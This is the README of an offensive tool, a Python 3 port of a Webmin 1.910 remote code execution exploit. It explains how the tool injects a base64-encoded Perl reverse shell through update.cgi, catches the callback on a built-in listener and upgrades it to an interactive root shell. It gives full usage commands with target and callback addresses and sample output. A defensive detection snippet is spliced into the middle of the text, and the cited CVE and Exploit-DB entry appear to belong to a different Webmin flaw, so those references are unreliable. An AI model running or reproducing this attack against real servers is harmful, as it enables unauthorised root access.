## https://sploitus.com/exploit?id=E60D5B9E-1B7B-5BE1-BD7A-A7A8656F9EDF
# Webmin 1.910 - Remote Code Execution
> **Original exploit by [roughiz](https://github.com/roughiz)**
> **Enhanced & ported to Python 3 by 4nuxd**
---
## Overview
This is a Python 3 port and enhancement of the original Webmin 1.910 Remote Code Execution exploit by **roughiz**. The vulnerability abuses the **Package Updates** module (`/package-updates/update.cgi`) to inject and execute arbitrary OS commands via an authenticated session.
- **CVE:** CVE-2019-15107
- **Affected Version:** Webmin ≤ 1.910
- **Auth required:** Yes (valid credentials)
- **Module:** Package Updates (`package-updates/update.cgi`)
---
## What's New in this Version
| Feature | Original | This version |
|---|---|---|
| Python version | Python 2 | Python 3 |
| Listener | External `nc` required | Built-in TCP listener |
| Shell stability | Raw dumb shell | Auto PTY upgrade |
| TTY size | Manual | Auto-detected from terminal |
| Ctrl+C passthrough | Kills script | Works correctly |
| Tab completion | Broken | Works |
---
## How It Works
1. Authenticates to Webmin via `session_login.cgi` and retrieves a session cookie
2. Crafts a Perl reverse shell payload, base64-encodes it, and injects it via the `u` parameter of `update.cgi`
3. The built-in listener catches the incoming connection
4. Automatically upgrades the dumb shell to a full PTY using `python3/python/script`
5. Sets correct terminal dimensions (`stty rows/cols`) and `TERM=xterm`
6. Drops you into a stable, fully interactive shell
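
From the defender's side, step 2 is the observable part: a request to `package-updates/update.cgi` whose `u` parameter is not a plain package identifier. The check below is an added example, not part of the original exploit or of Webmin. It assumes a reverse proxy or WAF hook that exposes the request URL and form body; the function name, the package-name allowlist and the sample requests are hypothetical and constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET = "/package-updates/update.cgi"
# Assumption: legitimate `u` values look like package identifiers (name or name/system).
PKG_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.+:_~/-]{0,127}$")
SHELL_META = re.compile(r"[|;&`$(){}<>\\'\"\s]")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def suspicious_update_params(url, body=""):
    """Return [(value, [reasons])] for each `u` parameter that is not a plain package name."""
    parts = urlsplit(url)
    if not parts.path.endswith(TARGET):  # tolerate a non-root base URI path
        return []
    # Merge query-string and form-body parameters; `u` may be repeated.
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    findings = []
    for value in params.get("u", []):
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell-metacharacter")
        if B64_RUN.search(value):
            reasons.append("long-base64-run")
        if not reasons and not PKG_NAME.match(value):
            reasons.append("not-a-package-name")
        if reasons:
            findings.append((value, reasons))
    return findings

# Constructed sample requests (inert placeholder data, not captured traffic).
URL = "http://webmin.example:10000/package-updates/update.cgi"
BENIGN_BODY = "u=acl&u=apache2%2Fapt"
SUSPECT_BODY = "u=acl&u=x%7C" + "QUJD" * 12

if __name__ == "__main__":
    for body in (BENIGN_BODY, SUSPECT_BODY):
        print(body[:40], "->", suspicious_update_params(URL, body))
```

The allowlist is deliberately strict; tune it to the package manager in use before alerting or blocking on it.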
---
## Requirements
```bash
pip install requests termcolor
```
Python 3.6+ required.
---
## Usage
```bash
python3 webmin_exploit_py3.py --rhost <target-ip> --lhost <your-ip> -p <password> [options]
```
### Arguments
| Argument | Description | Default |
|---|---|---|
| `--rhost` | Target IP address | *(required)* |
| `--rport` | Target Webmin port | `10000` |
| `--lhost` | Your IP for reverse shell callback | *(required)* |
| `--lport` | Your listener port | `4444` |
| `-u` / `--user` | Webmin username | `admin` |
| `-p` | Webmin password | *(required)* |
| `-t` | Base URI path | `/` |
| `-s` / `--SSL` | Use HTTPS (`true`/`false`) | `false` |
### Example
```bash
# Standard HTTP
python3 webmin_exploit_py3.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543
# With SSL
python3 webmin_exploit_py3.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543 -s true
# Through proxychains (HTB / pivot)
proxychains python3 webmin_exploit_py3.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543
```
---
## Expected Output
```
[*] Target : http://172.16.1.17:10000/
[*] User : admin
[*] Callback : 10.10.14.2:1234
[*] Authenticating...
[+] Got session cookie: abc123xyz
[*] Listening on 10.10.14.2:1234 ...
[*] Firing payload...
[+] Shell received from 172.16.1.17:54321
[+] TTY upgraded. Stable interactive shell ready.
root@webmin:~#
```
---
## Troubleshooting
**Authentication failed**
- Double-check credentials
- Try adding `-s true` if the server redirects to HTTPS
**Listener times out**
- Confirm `--lhost` is reachable from the target (use your VPN/tun0 IP on HTB)
- Check firewall rules on your machine: `sudo ufw allow <lport>`
- If pivoting, make sure proxychains is configured correctly
**Shell received but no prompt**
- Wait 2-3 seconds; the PTY upgrade takes a moment
- Press Enter once to trigger the prompt
---
## Disclaimer
This tool is intended **for authorized security testing only**: CTF platforms and environments where you have explicit written permission.
Unauthorized use against systems you do not own or have permission to test is **illegal**.
---
## Credits
| Role | Handle |
|---|---|
| Original exploit author | [roughiz](https://github.com/roughiz) |
| Python 3 port & enhancements | 4nuxd |
---
## References
- [CVE-2019-15107 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2019-15107)
- [Exploit-DB #47230](https://www.exploit-db.com/exploits/47230)
- [Webmin Advisory](http://www.webmin.com/security.html)